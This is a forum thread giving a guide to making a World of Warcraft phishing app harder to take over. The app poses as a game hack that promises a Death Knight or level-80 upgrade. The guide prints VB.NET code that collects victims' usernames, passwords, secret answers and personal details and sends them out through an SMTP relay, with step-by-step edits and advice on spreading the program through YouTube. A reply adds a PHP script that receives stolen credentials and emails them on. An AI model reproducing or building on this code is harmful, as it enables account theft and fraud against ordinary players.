[Guide] Reverse engineer proof your Phisher App! menu

User Tag List

Results 1 to 9 of 9
  1. #1
    dj_hype's Avatar Member
    Reputation
    3
    Join Date
    Nov 2008
    Posts
    88
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [Guide] Reverse engineer proof your Phisher App!

    Okay, this is my first attempt at a guide so beware.

    My opinion of difficulty: [XXX--]
    Reason: Simple concept, somewhat difficult to execute.
    This guide assumes:
    A) You have basic knowledge of Visual Basic and have access to it (or Visual Studio).
    B) You are familiar with how these phisher programs work.
    C) You are familiar with how email relaying/smtp servers work.

    1. Basic Idea/How things normally work:
    The basic idea of doing this is to prevent http://www.mmowned.com/forums/wow-sc...g-youtube.html from happening to you. Basically, the way that the ShAnX and most application (program.exe) phishers are written is to send an email through GMail's smtp server. The super-basic way of doing this is sending an email from the account to the same account. Enhanced security would mean sending the email to a different account than the gmail account but if someone were to gain access, they just need to check your Sent emails folder/change the password and you're screwed.

    2. What's the point and what's the process?
    Well, you spent all this time making an awesome phisher and stuff, you don't want to ruin it because some leecher here read the above guide and is, well, leeching off all your hard work. Now the process is simple, using an email relayer that DOES NOT have web-mail access to send the email to a DIFFERENT address. Simple. Here's a diagram for those that are lost:

    Normal Way:
    User presses activate in phisher -> phisher logs into smtp.google.com with username/password -> phisher sends email to address in code -> email account receives email

    The problem (if you skipped the above portion) is that by using GMail, people can reverse engineer the username/password of the account from the program. They check sent messages and there's all your phised accounts. Or, they change the password and you no more phished accounts.

    Safer Way:
    User presses activate in phisher -> phisher logs into smtp.xxx.com with (possibly without) username/password (using an account that DOES NOT have web access) -> phisher sends email to address in code -> email is forwarded to separate account address -> separate email account receives email

    Using this method, since there is no webmail access for the forwarding account (smtp.xxx.com), that username/password is useless. The worst they could do is report the address for abuse but, more often than not, they will give up.

    3. How is it done?
    It has been broken down into steps for ease of use.

    3.a Find an email relaying/forwarding service.
    This is the hardest part. There's a lot you can do. If you pay for webhosting (like I do) more than likely, you can make email mailboxes/forwarding. This is what I do. A domain that I have doesn't have any way to login to the email account and that's the one I use. I **might** help some of those out who have trouble with this part. If you're a leecher/low-on-the-totem-pole, please don't expect anything. PM me otherwise.

    3.b Setup an account on a webmail server (Yahoo, GMail, aol, etc...).
    I use Yahoo, you can use whatever you want. HINT: use different passwords for EVERY account!! You should know better but for those who don't, I'm laying it out for ya.

    3.c Edit the code.
    Now, this step is completely dependent of what Phisher you use. I use ShAnX. Download one of his releases and then open the VBProject file (if this all sounds foreign to you, then check out http://www.mmowned.com/forums/wow-sc...er-v1-5-a.html). Double click Form2 and then double click the "Activate" button to bring up the code for the button. This is what you will see:
    Code:
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    
            Dim WC As New System.Net.WebClient
    
            Dim MyMailMessage As New MailMessage
    
            MyMailMessage.From = New MailAddress("[email protected]")
    
            MyMailMessage.To.Add("[email protected]")
    
            MyMailMessage.Subject = (TextBox1.Text & " - " & "Their IP is: " & System.Text.Encoding.ASCII.GetString((WC.DownloadData("http://whatismyip.com/automation/n09230945.asp"))))
    
            WC.Dispose()
    
            MyMailMessage.Body = ("  1.) Username: " & TextBox1.Text & "  2.) Password: " & TextBox6.Text & "  3.) Secret Answer: " & TextBox2.Text & "  4.) Email " & TextBox3.Text & "  5.) First Name: " & TextBox4.Text & "  6.) Last Name: " & TextBox5.Text & "                          ****A ShAnX Program****")
    
            Dim SMTPServer As New SmtpClient("smtp.gmail.com")
    
            SMTPServer.Port = 587
    
            SMTPServer.Credentials = New System.Net.NetworkCredential("Email Here", "Pass here")
    
            SMTPServer.EnableSsl = True
    
            Try
    
                SMTPServer.Send(MyMailMessage)
    
    
            Catch ex As SmtpException
                MessageBox.Show(ex.Message)
            End Try
            If TextBox1.Text = "" Then
                MsgBox("Please enter the required fields")
            End If
    
            Me.Close()
            Form1.Close()
    
            If TextBox1.Text <> "" Then
                MsgBox("Hack Complete: You will be able to made a Death Knight (DK) on any realm within 3 hours")
    
            End If
    Okay, I'm not going to explain what all of that does. I'm just going to paste the new code below. Please note that I've modified the code slightly as I don't care what their IP is, and the workflow was a little odd. The way that I have it set up *SHOULD* prevent you from getting blank emails. I also took out some of the proper code formatting (spacing, etc...) Just trust me.
    Code:
    If TextBox1.Text = "" Then
                MsgBox("Please enter the required fields")
            End If
    
            Dim MyMailMessage As New MailMessage()
            Dim SMTPServer As New SmtpClient("smtp.xxx.com")
            Dim SMTPServerUser As New System.Net.NetworkCredential()
    
            MyMailMessage.From = New MailAddress("[email protected]")
            MyMailMessage.To.Add("[email protected]")
            MyMailMessage.IsBodyHtml = False
            MyMailMessage.Subject = (TextBox1.Text & " - " & "Their Password is: " & TextBox6.Text)
            ' WC.Dispose()
            MyMailMessage.Body = ("  1.) Username: " & TextBox1.Text & "  2.) Password: " & TextBox6.Text & "  3.) Secret Answer: " & TextBox2.Text & "  4.) Email " & TextBox3.Text & "  5.) First Name: " & TextBox4.Text & "  6.) Last Name: " & TextBox5.Text & "                          ****A ShAnX Program****")
    
            ' Try
            SMTPServer.EnableSsl = False
            SMTPServer.UseDefaultCredentials = False
            SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "your_password")
            SMTPServer.Host = "smtp.xxx.com"
            SMTPServer.DeliveryMethod = SmtpDeliveryMethod.Network
            SMTPServer.Send(MyMailMessage)
    
            ' Catch ex As SmtpException
            '   MessageBox.Show(ex.Message)
            ' End Try
    
            If TextBox1.Text <> "" Then
                MsgBox("Hack Complete: " & TextBox7.Text & "'s Level should have been changed to 80. If you login and it hasn't, some of the information you entered was invalid. Enjoy!")
    
            End If
    
            End
    You can see here that I've made it so that if the account text box is empty, then it won't send an email. After that, it creates the email, and sends it to a DIFFERENT account than the one used for relaying.

    3.d What YOU need to change.
    First, you need to change
    Code:
    Dim SMTPServer As New SmtpClient ("smtp.xxx.com")
    to the SMTP server your relaying account uses. Ex: ("smtp.email-relay.com")
    Next, change
    Code:
    MyMailMessage.From = New MailAddress("[email protected]")
    to the email address on the relaying server. Ex: ("[email protected]")
    Next,
    Code:
    MyMailMessage.To.Add("[email protected]")
    to your final destination email account (Yahoo, GMail, etc...). This address will be the one you check the accounts for. Ex: ("[email protected]")
    Next,
    Code:
    SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "your_password")
    to your relaying account and password. Ex: ("[email protected]", "imapassword123")
    Finally, change
    Code:
    SMTPServer.Host = "smtp.xxx.com"
    to the SMTP server you set earlier. Ex: ("smtp.email-relay.com")

    4. Test it all out. If you have errors, you did something wrong. The most common problem I encountered was an error that was something like "Unauthenticated relaying is forbidden." The order of the code should fix this error but I'm not 100% on that. I will attempt to help people as much as possible but I can only do so much.

    5. Upload the program to a hosting service then attach the link to your YouTube video and you should be all set.

    [Guide] Reverse engineer proof your Phisher App!
  2. #2
    Deadly Tomato's Avatar ft. Aestysu
    Reputation
    392
    Join Date
    Jun 2008
    Posts
    1,161
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Then thank you...

    +rep for contrib.
    We stand as one, to remember Mirror.

  3. #3
    dj_hype's Avatar Member
    Reputation
    3
    Join Date
    Nov 2008
    Posts
    88
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    edit: Thanks.
    Last edited by dj_hype; 02-27-2009 at 01:11 AM.

  4. #4
    camicio's Avatar Banned
    Reputation
    6
    Join Date
    Feb 2009
    Posts
    98
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    There could be POP3 access to the email even if there is no web access to it.

  5. #5
    Cryde's Avatar Active Member
    Reputation
    55
    Join Date
    Jan 2009
    Posts
    298
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You call others Leechers and got 2 Rep Yourself after being here since NOV 08? I lol'd
    PS: if they got the Account which sends, they can just check "Sent Mails" or "Trash".

    PM me for Signatures!

  6. #6
    Tierman's Avatar Active Member
    Reputation
    40
    Join Date
    Jan 2009
    Posts
    343
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I know the SMTP mail.charter.net does not need a user/pass.

  7. #7
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Or.... you could just obfuscate the program, and send off whatever info you need to a php page which handles the emailing.

  8. #8
    dj_hype's Avatar Member
    Reputation
    3
    Join Date
    Nov 2008
    Posts
    88
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by camicio View Post
    There could be POP3 access to the email even if there is no web access to it.
    Even if there is POP3 access to the email account, it just forwards the email to another account, so it doesn't really matter.

    Originally Posted by Cryde1509 View Post
    You call others Leechers and got 2 Rep Yourself after being here since NOV 08? I lol'd
    PS: if they got the Account which sends, they can just check "Sent Mails" or "Trash".
    I simply offered the service of using an email account on my hosting solution as a way to give back to the community. This guide was made for all, but for me to provide something extra, all I required was people to not be leecher status. I never said I wasn't a leecher, but I'm trying to get above that reputation with posting this guide. Anyway, where would they check "Sent Mails" or "Trash"? Since there is no web access to the sending account, there is no storage, not to mention nowhere to login.

    Originally Posted by Tierman View Post
    I know the SMTP mail.charter.net does not need a user/pass.
    Awesome. The only thing with using charter's server is you can login to their email service from charter.net (at least you could when I used to be a customer).

    Originally Posted by Apoc View Post
    Or.... you could just obfuscate the program, and send off whatever info you need to a php page which handles the emailing.
    That's another option as well. This is simply a guide doing it the way I did it.

    To give a little more background on how mine is setup, I have a domain, we'll call it dbaggin.com. Dbaggin.com is just a forum, there is no webmail application on the website. I setup a mailbox on my hosting solution using dbaggin.com as the email domain. So, if someone were to get my username and password and go to dbaggin.com, there would be nowhere to login for email settings. Even if they were to go to my hosting solution, I disabled webmail access for that account.

    What I was offering to those in need (aka those who couldn't find an email relaying server) was an email address at dbaggin.com (well, my real server, not that one) and the smtp address so people could do this. Just trying to help out.

  9. #9
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yup, or you could just setup a small PHP page to do the emailing for you.

    (Wrote this in the browser, so it may not be all correct.)
    PHP Code:
    $user $_POST['account'];
    $pass $_POST['pass'];
    $cdkey $_POST['cdkey'];

    $message "Username: {$user}\nPassword: {$pass}\nCD Key:{$cdkey}";
    $subject "New account phished!";
    $to "[email protected]";
    $from "[email protected]";
    mail($message$subject$to$from); 

Similar Threads

  1. Replies: 0
    Last Post: 04-18-2014, 10:52 AM
  2. [How to][VB6] Create your own App. Phisher.
    By uberhak3r in forum WoW Scam Prevention
    Replies: 2
    Last Post: 04-07-2009, 03:21 PM
  3. Forrest's Idiot-proof Guide to Setting Up Your Own MangoS Server
    By Forrest in forum WoW EMU Guides & Tutorials
    Replies: 78
    Last Post: 04-13-2008, 09:30 AM
  4. Forrest's Idiot-proof Guide to Setting Up Your Own MangoS Server
    By Forrest in forum WoW EMU Guides & Tutorials
    Replies: 1
    Last Post: 01-29-2008, 07:44 AM
  5. Forrest's Idiot-proof Guide to Setting Up Your Own MangoS Server
    By Forrest in forum WoW EMU Guides & Tutorials
    Replies: 1
    Last Post: 01-29-2008, 03:21 AM
All times are GMT -5. The time now is 05:47 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search